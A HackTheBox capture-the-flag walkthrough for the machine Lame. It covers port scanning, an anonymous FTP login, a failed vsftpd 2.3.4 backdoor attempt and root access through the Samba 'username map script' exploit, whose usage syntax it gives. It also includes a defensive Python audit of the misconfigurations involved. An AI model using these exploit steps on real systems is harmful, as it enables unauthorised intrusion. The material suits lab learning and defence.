HackTheBox: Lame

Walk-through

Naman Jain
InfoSec Write-ups


Hey guys, this time I’ll root Lame from Hackthebox, which is rated as an Easy Linux machine.

Without further ado, let’s exploit.

Initials:

export IP=10.129.99.7

port scanning

rustscan -a $IP --ulimit 5000 | tee ports.txt

Got three open ports i.e., 21 (ftp), 22 (ssh), 139 (samba)

rustscan results

nmap

nmap -sC -sV -p21,22,139 -oN namp $IP -Pn

nmap results

Exploit

FTP

I found that anonymous login was allowed on FTP, so I logged in to the FTP service

ftp $IP

but there were no files.

Later I checked for the vsftpd 2.3.4 exploit and found one Exploit named “backdoor”. I used Metasploit and other scripts but failed to get a session/shell.

failed to exploit FTP

Later I found this in the module description:

This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011.

Samba

Since the FTP exploit didn’t work and I didn’t have SSH credentials, I went for Samba. There was one writable share named tmp, some of whose files were not accessible.

smb shares

Found the exploit for samba named “username map script” command execution

I got the exploit script from GitHub and modified the payload (and added some tweaks XD).

Syntax for the script was

./username.py <rhosts> <rport> <lhost> <lport>

→ Start the listener

→ ran the script

and got the shell as root. There was no need for PrivEsc (:
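From the defender's side, the three things this walkthrough relied on (anonymous FTP login, a guest-writable tmp share, and Samba's "username map script" option) can all be checked in the service configuration. The Python audit below is an added example, not part of the original write-up or any exploit script mentioned in it; the sample configs and the script path inside them are constructed for illustration.

```python
import re

# Constructed sample configs mirroring what the walkthrough relied on.
# The mapusers.sh path is a made-up placeholder, not taken from the box.
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   username map script = /etc/samba/scripts/mapusers.sh
[tmp]
   path = /tmp
   read only = no
   guest ok = yes
"""
SAMPLE_VSFTPD_CONF = "listen=YES\nanonymous_enable=YES\n#write_enable=YES\n"
TRUE = {"yes", "true", "1"}

def parse_smb_conf(text):
    """Return {section: {normalised_key: value}} for smb.conf-style text."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        m = re.fullmatch(r"\[(.+)\]", line)
        if m:
            current = sections.setdefault(m.group(1).strip().lower(), {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            # Samba ignores case and whitespace inside parameter names
            current[re.sub(r"\s+", "", key).lower()] = value.strip()
    return sections

def audit(smb_text, vsftpd_text):
    findings = []
    for name, opts in parse_smb_conf(smb_text).items():
        if opts.get("usernamemapscript"):
            findings.append(f"smb [{name}]: username map script is set")
        # writable / writeable / write ok are inverted synonyms of read only
        writable = (opts.get("readonly", "yes").lower() not in TRUE
                    or any(opts.get(k, "no").lower() in TRUE
                           for k in ("writable", "writeable", "writeok")))
        guest = any(opts.get(k, "no").lower() in TRUE for k in ("guestok", "public"))
        if writable and guest:
            findings.append(f"smb [{name}]: share is writable by guests")
    # vsftpd permits anonymous logins by default when the option is absent
    vs = dict(l.strip().split("=", 1) for l in vsftpd_text.splitlines()
              if "=" in l and not l.lstrip().startswith("#"))
    if vs.get("anonymous_enable", "YES").strip().lower() in TRUE:
        findings.append("vsftpd: anonymous login is enabled")
    return findings
```

Calling `audit(SAMPLE_SMB_CONF, SAMPLE_VSFTPD_CONF)` returns one finding per weak setting; an empty list means none of the three was detected.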

Proof

user and root.txt

Outro

That’s all for this machine, we’ll meet in the next blog. Till then, Happy Hacking o7